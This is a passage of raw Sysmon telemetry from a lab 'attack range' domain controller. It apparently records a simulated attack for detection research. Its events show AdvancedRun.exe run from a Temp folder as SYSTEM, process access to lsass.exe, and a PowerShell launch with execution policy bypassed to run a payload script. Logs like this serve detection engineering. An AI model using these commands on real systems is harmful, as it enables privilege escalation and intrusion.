534500x80000000000000004081255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:18:02.352{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000004080643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.471{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14F5-61EB-A308-000000002702}5972C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2878|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004080620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.463{834264DD-14F5-61EB-A308-000000002702}5972C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"C:\Windows\System32\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator 10341000x80000000000000004080606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.009{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.008{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.008{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004080581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.541{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\winsta.dll10.0.14393.0 (rs1_release.160715-1616)Winstation LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationwinsta.dllMD5=74261D485681A12AFF1AD517FD0EF200,SHA256=DEC3B7B1EBF3F7F4940FE63D665E2C50F6447C848C35C64B1BDE446E04358480trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 534500x80000000000000004080575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.544{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeNT AUTHORITY\SYSTEM 10341000x80000000000000004080574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.542{834264DD-DAE6-61EA-0D00-000000002702}8761012C:\Windows\system32\svchost.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000004080573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.532{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wtsapi32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Remote Desktop Session Host Server SDK APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationwtsapi32.dllMD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5EtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000004080572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.530{834264DD-14EF-61EB-A208-000000002702}37965672C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x10C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1bb7|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+98fa|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.529{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000004080570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.528{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000004080569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.523{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.519{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.518{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.517{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.517{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.516{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.515{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.515{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.514{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.513{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.509{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080548Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft 